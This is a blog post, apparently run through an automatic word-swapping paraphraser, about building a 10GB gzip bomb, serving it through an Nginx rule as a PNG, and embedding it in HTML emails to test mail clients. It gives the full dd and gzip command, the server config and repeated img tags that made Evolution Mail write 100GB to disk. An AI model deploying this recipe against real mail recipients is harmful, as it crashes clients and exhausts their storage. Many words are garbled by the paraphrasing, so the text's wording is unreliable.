Enjoyable with Gzip Bombs and E mail Shoppers

Gzip/Zip bombs have been a factor for many years. Lets create a 10MB gzip file which decompresses to 10GB:

dd if=/dev/zero bs=1G rely=10 | gzip > 10gb.gz

This known as a Gzip bomb, as a result of when it’s decompressed, it blows as much as a a lot bigger measurement (~1000 bigger). Add it your web site doc root and configure Nginx to serve it up as a picture, with gzip Content-Encoding:

location /10gb.png {
    default_type picture/png;
    add_header   Content-Encoding gzip;
    try_files    /10gb.gz =404;
}

An HTTP shopper which fetches this file will see that the Content-Encoding is ready to gzip and so will often attempt to decompress it on the fly, which means you’ll have despatched 10MB of information over the community, however the HTTP shopper will now have 10GB of information to take care of.

Firefox doesn’t appear to have a difficulty with this. It figures out fairly shortly that it’s not a picture and doesn’t appear to retailer the decompressed knowledge wherever.

What about e mail shoppers although? And what concerning the proxies that some e mail companies have began to make use of to cover your IP from the sender? Send a html e mail containing:

src="https://YOUR_WEBSITE/10gb.png">

Thunderbird and Gmail’s net proxies, begin to fetch the picture, however bail out early earlier than ending fetching the 10MB. I’m unsure if it’s because they will inform it’s not a picture, or as a result of they’re decompressing it, and hit a restrict. Hopefully the latter. Either method, it really works nicely.

Protonmail and iCloud webmail’s proxies appear to fetch the entire 10MB file, however discard it. Protonmail will warn you that it didn’t load the picture, and provide the possibility of loading it straight out of your net browser (not utilizing their proxy). If you say sure, you leak your IP, however the browser doesn’t crash. This works nicely.

Fastmail webmail’s proxies downloaded the total 10MB and proceeded to ship me 385MB of information earlier than giving up. The UI remained responsive, so though they need to have bailed earlier, at the very least it really works. I’m wondering if there’s a 10GB file sat on considered one of their servers now.

iOS Mail partially downloads the file after which crashes. Not a terrific expertise, however not the tip of the World; you’ll be able to simply delete the e-mail if you get again in.

Evolution Mail has no protection for this. It downloads the entire 10MB after which proceeds to completely decompress it into its cache/evolution/http/ listing. I despatched myself an e mail with this within the physique:

src="https://YOUR_HOSTNAME/10gb.png">
src="https://YOUR_HOSTNAME/10gb.png?x=1">
src="https://YOUR_HOSTNAME/10gb.png?x=2">
src="https://YOUR_HOSTNAME/10gb.png?x=3">
src="https://YOUR_HOSTNAME/10gb.png?x=4">
src="https://YOUR_HOSTNAME/10gb.png?x=5">
src="https://YOUR_HOSTNAME/10gb.png?x=6">
src="https://YOUR_HOSTNAME/10gb.png?x=7">
src="https://YOUR_HOSTNAME/10gb.png?x=8">
src="https://YOUR_HOSTNAME/10gb.png?x=9">

In lower than a minute after clicking “Load remote content”, Evolution Mail had added 100GB of information to my laptops disk.

It’s all the time a good suggestion to code defensively if you’re fetching knowledge from exterior companies. Always assume some sensible arse will make their server ship you extra knowledge than is affordable.

Another bizarre factor I seen about Evolution Mail when testing this. It caches the downloaded distant content material in a file with a filename consisting of an MD5 of the URL. But if you happen to don’t use one of many restricted question string codecs they like, they take away the question string from the MD5 calculation. According to Evolution Mail’s cache these two URLs are the identical and must be cached to the identical file:

So if you happen to obtain an e mail containing an and then receive a second email containing an the cached picture from the primary e mail is displayed within the second e mail.

[edit] Somebody has helpfully reported the above issues to the Evolution Mail undertaking. I don’t interact with that undertaking straight anymore attributable to earlier poor remedy by it’s members.